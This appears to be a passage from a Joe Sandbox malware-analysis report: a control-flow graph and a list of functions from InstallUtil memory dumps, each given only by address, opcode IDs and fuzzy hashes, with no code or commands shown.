                                                                                          control_flow_graph 3241 b7a1da-b7a1dc 3242 b7a1df-b7a1e2 3241->3242 3243 b7a1f5-b7a1f8 3242->3243 3244 b7a1e4 3242->3244 3245 b7a21b-b7a21e 3243->3245 3246 b7a1fa-b7a216 3243->3246 3380 b7a1e7 call b7a2a0 3244->3380 3381 b7a1e7 call b7a49e 3244->3381 3382 b7a1e7 call b7a1da 3244->3382 3248 b7a253-b7a256 3245->3248 3249 b7a220-b7a24e 3245->3249 3246->3245 3247 b7a1ed-b7a1f0 3247->3243 3250 b7a272-b7a274 3248->3250 3251 b7a258-b7a267 3248->3251 3249->3248 3253 b7a276 3250->3253 3254 b7a27b-b7a27e 3250->3254 3260 b7a26d 3251->3260 3261 b7a4bb 3251->3261 3253->3254 3257 b7a284 3254->3257 3258 b7a1a9-b7a1ac 3254->3258 3267 b7a28e-b7a292 3257->3267 3262 b7a1b2-b7a1b5 3258->3262 3263 b7a4be-b7a4c7 3258->3263 3260->3250 3261->3263 3265 b7a1b7-b7a1c0 3262->3265 3268 b7a1d2-b7a1d5 3262->3268 3263->3265 3266 b7a4cd-b7a4d7 3263->3266 3269 b7a1c6-b7a1cd 3265->3269 3270 b7a4da-b7a4e2 3265->3270 3383 b7a295 call b7a6b0 3267->3383 3384 b7a295 call b7a6b8 3267->3384 3268->3242 3271 b7a1d7-b7a1d9 3268->3271 3269->3268 3275 b7a4e6-b7a50a 3270->3275 3276 b7a4e4 3270->3276 3271->3241 3272 b7a29b-b7a29e 3274 b7a2aa-b7a2ac 3272->3274 3278 b7a2b5-b7a2b7 3274->3278 3277 b7a50c-b7a50f 3275->3277 3276->3275 3280 b7a511-b7a514 3277->3280 3281 b7a519-b7a51c 3277->3281 3278->3261 3279 b7a2bd-b7a2cb 3278->3279 3279->3261 3287 b7a2d1-b7a32e 3279->3287 3280->3281 3282 b7a52e-b7a531 3281->3282 3283 b7a51e 3281->3283 3284 b7a556-b7a559 3282->3284 3285 b7a533-b7a555 3282->3285 3290 b7a526-b7a529 3283->3290 3288 b7a55b-b7a575 3284->3288 3289 b7a57a-b7a57d 3284->3289 3334 b7a334-b7a387 3287->3334 3335 b7a3ff-b7a419 3287->3335 3288->3289 3292 b7a5a5-b7a5a8 3289->3292 3293 b7a57f-b7a59e 3289->3293 3290->3282 3294 b7a5af-b7a5b2 3292->3294 3295 b7a5aa-b7a5ac 3292->3295 3302 b7a5a0 3293->3302 3303 b7a5ed-b7a5ee 3293->3303 3298 b7a694-b7a69e 3294->3298 3299 b7a5b8-b7a5bb 3294->3299 3295->3294 3304 b7a5bd-b7a5c3 3299->3304 3305 b7a5ca-b7a5cd 3299->3305 3302->3292 3312 b7a5f3-b7a5f6 3303->3312 3308 b7a5c5 3304->3308 3309 b7a5f8-b7a5fe 3304->3309 3310 b7a5cf-b7a5dd 3305->3310 3311 b7a5e8-b7a5eb 3305->3311 3308->3305 3313 b7a604-b7a60b 3309->3313 3314 b7a69f-b7a6a7 3309->3314 3310->3285 3323 b7a5e3 3310->3323 3311->3303 3311->3312 3312->3309 3316 b7a610-b7a613 3312->3316 3313->3316 3317 b7a615-b7a62d 3316->3317 3318 b7a632-b7a635 3316->3318 3317->3318 3320 b7a657-b7a65a 3318->3320 3321 b7a637-b7a652 3318->3321 3320->3304 3326 b7a660-b7a663 3320->3326 3321->3320 3323->3311 3329 b7a665-b7a67d 3326->3329 3330 b7a682-b7a684 3326->3330 3329->3330 3331 b7a686 3330->3331 3332 b7a68b-b7a68e 3330->3332 3331->3332 3332->3277 3332->3298 3356 b7a3a7-b7a3ca call b7798c 3334->3356 3357 b7a389-b7a3a5 3334->3357 3343 b7a41b-b7a41d 3335->3343 3345 b7a41f-b7a429 3343->3345 3346 b7a42b 3343->3346 3347 b7a430-b7a432 3345->3347 3346->3347 3349 b7a434-b7a438 3347->3349 3350 b7a4a3-b7a4b5 3347->3350 3351 b7a43a-b7a447 3349->3351 3352 b7a449 3349->3352 3350->3261 3350->3287 3355 b7a44e-b7a450 3351->3355 3352->3355 3355->3350 3358 b7a452-b7a454 3355->3358 3369 b7a3cc-b7a3fd 3356->3369 3357->3369 3358->3350 3359 b7a456-b7a49c 3358->3359 3359->3350 3369->3343 3380->3247 3381->3247 3382->3247 3383->3272 3384->3272
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e068452a3501bba281094f3a2a132c05b90e2843f77d815076d58b9abdeb5791
                                                                                          • Instruction ID: fe992d323bac6808ee8b0686434c607bb1be43cab9e3cb63d0d6d5c22f55b5fb
                                                                                          • Opcode Fuzzy Hash: e068452a3501bba281094f3a2a132c05b90e2843f77d815076d58b9abdeb5791
                                                                                          • Instruction Fuzzy Hash: 04E18E34B002058FDB54DB68D494AADB7F2FBC9310F2484A9E51AEB395DB31DD46CB81
                                                                                          Function 00B7416F Relevance: .3, Instructions: 276COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 881de0f5cfeb2fc9a1b5ade4b2254b8a8c8b96d9e3a65f8acbe769b2461b7e88
                                                                                          • Instruction ID: bb239be1736642fcb2708f358fc53e6ec1d0defccd46270dfa307a47ce06a025
                                                                                          • Opcode Fuzzy Hash: 881de0f5cfeb2fc9a1b5ade4b2254b8a8c8b96d9e3a65f8acbe769b2461b7e88
                                                                                          • Instruction Fuzzy Hash: 3FB14970E10219CFDB10CFA9C8857AEBBF1EF88305F14C169E829A7394EB749845CB85
                                                                                          Function 00B74A3F Relevance: .3, Instructions: 259COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 30843ea533d81767c7f5cfbe46d9b5698c1486f0208a488e51717be0cbebdcde
                                                                                          • Instruction ID: 2f16da830bdfc0baffd8f8cafe98499acbdd81b58d7e7853584451e7dbe19026
                                                                                          • Opcode Fuzzy Hash: 30843ea533d81767c7f5cfbe46d9b5698c1486f0208a488e51717be0cbebdcde
                                                                                          • Instruction Fuzzy Hash: 70A15970E002098FDB20CFA8D89579DBBF1EF88715F24C569D869AB394EB749845CB81
                                                                                          Function 00B73E27 Relevance: .2, Instructions: 233COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 942da24cd79959c7f9066783740bbdb6ee800ff29b46cd9668176bbe9d7142c2
                                                                                          • Instruction ID: 53c997aba038a40e2fc4553be4c05d33d05ea0d2a96100e587c6885031795a49
                                                                                          • Opcode Fuzzy Hash: 942da24cd79959c7f9066783740bbdb6ee800ff29b46cd9668176bbe9d7142c2
                                                                                          • Instruction Fuzzy Hash: 61915C70E00209CFDB10CFA9C9857EEBBF1EF88714F14C169E429AB294DB749985CB91
                                                                                          Function 00B7A6B8 Relevance: .2, Instructions: 220COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a90a159342cee4d3e72ebb5633d37689899eea355bd7d35bbefb25a6ed833b7d
                                                                                          • Instruction ID: acfd797e6d215ba3da52cc8e4d62414bc14f7d386b544f95f6d3649040e39aad
                                                                                          • Opcode Fuzzy Hash: a90a159342cee4d3e72ebb5633d37689899eea355bd7d35bbefb25a6ed833b7d
                                                                                          • Instruction Fuzzy Hash: DD81AC71A002058FDB54DFA9D884B9DBBF5FF88310F14C1A9EA18AB395EB709D05CB91
                                                                                          Function 00B76E88 Relevance: .2, Instructions: 172COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ba4c639e9ff0d189b27ed74e92329c6474cbc8e812d97bacb04690803f8ab278
                                                                                          • Instruction ID: 8513b3e112dda0a9eaf827675f6aad128cd9e565edb93213259f0193d2d7fcd0
                                                                                          • Opcode Fuzzy Hash: ba4c639e9ff0d189b27ed74e92329c6474cbc8e812d97bacb04690803f8ab278
                                                                                          • Instruction Fuzzy Hash: 5F5190347046448FCB14EB78D458AAE7BF2FF89754F2080A9E41AEB3A1DA75DC01CB91
                                                                                          Function 00B710D0 Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e8c276f4adbcdd819223886c08804c38db7d579ce13457ffd92163acf33cb18
                                                                                          • Instruction ID: 5189dab988ed5e53b7fe337e1c3ac42904f512ab9e1d3134ea386fd0f9b3d783
                                                                                          • Opcode Fuzzy Hash: 4e8c276f4adbcdd819223886c08804c38db7d579ce13457ffd92163acf33cb18
                                                                                          • Instruction Fuzzy Hash: C6518330105683CFD706EF7CF8645963FB2EBD730470549EAD1544B2BAEB60990ACB92
                                                                                          Function 00B76C8D Relevance: .1, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 942f64722bd683599abb0d8989b1cde57bb4b0a80204b2f0ea62a68e590669e1
                                                                                          • Instruction ID: 0a193b857f1059720e4aab857ff52bf016bbbd3d2e5b8b9d319706a27630845f
                                                                                          • Opcode Fuzzy Hash: 942f64722bd683599abb0d8989b1cde57bb4b0a80204b2f0ea62a68e590669e1
                                                                                          • Instruction Fuzzy Hash: 44511174E106188FDB28CFA9C885B9DBBF1FF48300F14856AE829BB351C774A844CB90
                                                                                          Function 00B76C98 Relevance: .1, Instructions: 132COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3deb1e5c78b1a77380746ae24e7c0552c55acec61ba7cb69e0643ee6d7e70c12
                                                                                          • Instruction ID: ea492077c021bf08db97be34bb689609e175afbd247ceb94def2491e7305e744
                                                                                          • Opcode Fuzzy Hash: 3deb1e5c78b1a77380746ae24e7c0552c55acec61ba7cb69e0643ee6d7e70c12
                                                                                          • Instruction Fuzzy Hash: 96511474E106188FDB28CFA9C885B9DBBF1FF48310F14856AE829BB351D774A844CB95
                                                                                          Function 00B71128 Relevance: .1, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b73eefd719ba0de2ac0b392c0bf6a98c7ce9aa01e9ab925f07b5323253361039
                                                                                          • Instruction ID: af21a02265c69971f7d5c6c5be8d6aec60ae2c94744e478e1706545e810d07c3
                                                                                          • Opcode Fuzzy Hash: b73eefd719ba0de2ac0b392c0bf6a98c7ce9aa01e9ab925f07b5323253361039
                                                                                          • Instruction Fuzzy Hash: 29412030105583CFD706EF68F8989963FB3FBDA30530459E9D1145B2BAE7A0A80ADB81
                                                                                          Function 00B77D48 Relevance: .1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd38a0750d6f8c7d4b66f7813b21818f181645b57769f6b5d2b833819750954d
                                                                                          • Instruction ID: 6f4d15931380488438e20438925e8742667f89d61206f9fe81cfac16ac258a8d
                                                                                          • Opcode Fuzzy Hash: bd38a0750d6f8c7d4b66f7813b21818f181645b57769f6b5d2b833819750954d
                                                                                          • Instruction Fuzzy Hash: 60319F30E44249CFDB15CFA4D8447AEB7F6EF89304F2088A5E429EB290DBB09C81CB40
                                                                                          Function 00B7268C Relevance: .1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 29e819e1fe214aed16c40c754b6ebf692c134f389282b6c32f345a08d0be7c7d
                                                                                          • Instruction ID: 09aa3d0c7ead294139867eef4ee196e4a298b07cc1b1183910df520aaf287073
                                                                                          • Opcode Fuzzy Hash: 29e819e1fe214aed16c40c754b6ebf692c134f389282b6c32f345a08d0be7c7d
                                                                                          • Instruction Fuzzy Hash: 52411070D00349DFDB14CFA9C985ADEBBF5FF48700F108069E819AB250DB75A946CB91
                                                                                          Function 00B77D38 Relevance: .1, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9edaad332e03a35c821661f7680eb3ea820606ea7973562a3a7b0b1848c3d75
                                                                                          • Instruction ID: 2635a1091646c1a6749a7f45b5a737e842848f7f245c9f979856f776fbb602d4
                                                                                          • Opcode Fuzzy Hash: e9edaad332e03a35c821661f7680eb3ea820606ea7973562a3a7b0b1848c3d75
                                                                                          • Instruction Fuzzy Hash: C8317070E442498BDB25CF64C4947AEB7F6EF59304F20C4A5E81AEB290EF719C42CB50
                                                                                          Function 00B71138 Relevance: .1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c2f808976e1bfb3ad17dc44f9e2ec0f237593c8593283981f37377639626c775
                                                                                          • Instruction ID: 9cad4c7e6785a42a3912e917cfff7ac375c0f8222849b62272e8262384230b13
                                                                                          • Opcode Fuzzy Hash: c2f808976e1bfb3ad17dc44f9e2ec0f237593c8593283981f37377639626c775
                                                                                          • Instruction Fuzzy Hash: D3411F30201943CFD605FF68F898A563B73FBDA30570059A9E1145B2BAE7A0A909DB81
                                                                                          Function 00B76B50 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a28ca3e0ec0bfb01dbeb223c2b2e47f5876f5525920d142f6e5119ab0849959c
                                                                                          • Instruction ID: 9a6202ba60df13425d6b73124b3d964a6aeb2f327bf1ec28c6f2d7df80418aae
                                                                                          • Opcode Fuzzy Hash: a28ca3e0ec0bfb01dbeb223c2b2e47f5876f5525920d142f6e5119ab0849959c
                                                                                          • Instruction Fuzzy Hash: E3210931604A859FCB16AB78A4553ED7FE2EFC6350F00C9EAD5588B256EE258C09C782
                                                                                          Function 00B72698 Relevance: .1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 15c2ee947554160c2c56d76f755cf93a3063c9e0fd7a444e85809e6d5a1638b2
                                                                                          • Instruction ID: ed8adf22702dfb66c10ed4f9f76d15c17a37821acb5dfb4c8157beca6b31e5ba
                                                                                          • Opcode Fuzzy Hash: 15c2ee947554160c2c56d76f755cf93a3063c9e0fd7a444e85809e6d5a1638b2
                                                                                          • Instruction Fuzzy Hash: A841EEB0D00349DFDB14DFA9C584ADEBBF5FF48310F20806AE819AB250DB75A945CB91
                                                                                          Function 00B7A05F Relevance: .1, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2a645e935b97c09ea97b6e40485b9a487bd0ef9415462e46a6784a8fb5a3c1f4
                                                                                          • Instruction ID: cd52f6491c9b4b68ffd5d15d14b266ba77c0d3ba157465792eb37c27b6e7d553
                                                                                          • Opcode Fuzzy Hash: 2a645e935b97c09ea97b6e40485b9a487bd0ef9415462e46a6784a8fb5a3c1f4
                                                                                          • Instruction Fuzzy Hash: 3231C031E0060A9BDB15CF64C89569EF7B2FFC6310F10C699E959BB680EB70D845CB81
                                                                                          Function 00B7164F Relevance: .1, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 846a636d68337dbc1c7d8e25e05c11b5024486de6c89dfc4b802a75cd02a4177
                                                                                          • Instruction ID: e4f3cdf09aeddc26808be2bb9881bf8ce1ba3055973918a5211985aacdb6d71b
                                                                                          • Opcode Fuzzy Hash: 846a636d68337dbc1c7d8e25e05c11b5024486de6c89dfc4b802a75cd02a4177
                                                                                          • Instruction Fuzzy Hash: 892124386001428FEF22EB7CF89879937B2EB56304F148DE5D05ACB255EA74DC458BE2
                                                                                          Function 00B7A070 Relevance: .1, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d35d915e6335dc6d36ff795a1c49ea8d621f7f85a24bfe16d92d325df3b8b5da
                                                                                          • Instruction ID: 6fe25ff59d6630bf3d5d98c75c4fa86a4afa8bc75d303be40281c1ec272f8289
                                                                                          • Opcode Fuzzy Hash: d35d915e6335dc6d36ff795a1c49ea8d621f7f85a24bfe16d92d325df3b8b5da
                                                                                          • Instruction Fuzzy Hash: D0217E34A0020A9BDB05DFA4D89469EF7B6EFCA300F50C559E919BB240DB719C45CB91
                                                                                          Function 0095D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2752079108.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_95d000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b9ef1c00d0e6c13c281d20d97d353fddab5cd821534e7d5cfbe3043ecbc691fa
                                                                                          • Instruction ID: a6acfe1ad1cac91cd643bdf8180e785e8c072b198f437f378b105f61bd75cadc
                                                                                          • Opcode Fuzzy Hash: b9ef1c00d0e6c13c281d20d97d353fddab5cd821534e7d5cfbe3043ecbc691fa
                                                                                          • Instruction Fuzzy Hash: 89212572500204EFDB25DF14D9C0B26BF65FB98319F20856DED090B25AD33AD85ACBA2
                                                                                          Function 00B79F60 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5541aff3781c220860eb3416a2f8f9748873b05783011af25915e915875c0e26
                                                                                          • Instruction ID: 5d5d71baa4f3c3992dcc699a3e00579fb099a51b8af282f9f9d686d3d4ff3060
                                                                                          • Opcode Fuzzy Hash: 5541aff3781c220860eb3416a2f8f9748873b05783011af25915e915875c0e26
                                                                                          • Instruction Fuzzy Hash: C7215131E012559BCB19CFA4D4519EEB7F2EF89310F20C56AE826FB290DB70A946CB51
                                                                                          Function 00B71828 Relevance: .1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8606e876278bf8bc16e0352b7e710d68a57a783230f0df40764b02d3298e8c05
                                                                                          • Instruction ID: 860f85ba40b99dee026983e6616b466842d28873ff6625f94706b08f691372dc
                                                                                          • Opcode Fuzzy Hash: 8606e876278bf8bc16e0352b7e710d68a57a783230f0df40764b02d3298e8c05
                                                                                          • Instruction Fuzzy Hash: 15212C31B00245CFDB24EB7CC5656AE77F2EB89304F1448A8D51AEB2A0DB359D41DB61
                                                                                          Function 00AAD044 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753098880.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aad000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58e56e8bee4fa27548dfa86858981046102d213be37a977c871a4294c91e0d4e
                                                                                          • Instruction ID: 74e5d6d2fffad718d87c2478f046abd4e63a548a7b95d2e67dc7ab17a4278b6d
                                                                                          • Opcode Fuzzy Hash: 58e56e8bee4fa27548dfa86858981046102d213be37a977c871a4294c91e0d4e
                                                                                          • Instruction Fuzzy Hash: F4210771504304EFDB14DF24D9C4B26BB75FB85314F20C96DE98B4B682C77AD846CA61
                                                                                          Function 00B71333 Relevance: .1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df42a282ecd6345449a8e6660e0c9ce5bf8e45cbf23ccdcfd39bf9df7ac0516d
                                                                                          • Instruction ID: 587a39b69125e23490f8abc27ceb25125b147b393e712b3cfc05c1bc685bb637
                                                                                          • Opcode Fuzzy Hash: df42a282ecd6345449a8e6660e0c9ce5bf8e45cbf23ccdcfd39bf9df7ac0516d
                                                                                          • Instruction Fuzzy Hash: F721C334A002419FEB325B3CE4983AD7BE1D757301F118CEAE46AC7780DB64CD9587A6
                                                                                          Function 00B71838 Relevance: .1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eb4b996928b61c6de1857094ad957dc4657e7d4267f68df8a5cf5260bb434ab6
                                                                                          • Instruction ID: 5d9308296832fc05a9e36b182575bfb958fdbf3866c5af64444462a8dbe1a660
                                                                                          • Opcode Fuzzy Hash: eb4b996928b61c6de1857094ad957dc4657e7d4267f68df8a5cf5260bb434ab6
                                                                                          • Instruction Fuzzy Hash: 93213C30B00245CFDB14EB7CC5656AE77F6EB89300F1048A8D51AEB3A0DB359D41DBA2
                                                                                          Function 00B79F70 Relevance: .1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c251fef17478b1ecbd174c4846ea2101777e433897722f360f83a9cdfde6da50
                                                                                          • Instruction ID: e7bde189eee061e7bb569909696acb63f7d569b6975537d0c7495a472cd4fc95
                                                                                          • Opcode Fuzzy Hash: c251fef17478b1ecbd174c4846ea2101777e433897722f360f83a9cdfde6da50
                                                                                          • Instruction Fuzzy Hash: 49215031E002199BCB19CFA4D45099EB7F2EF89310F10C65AE826FB390DB70A845CB51
                                                                                          Function 00B71660 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
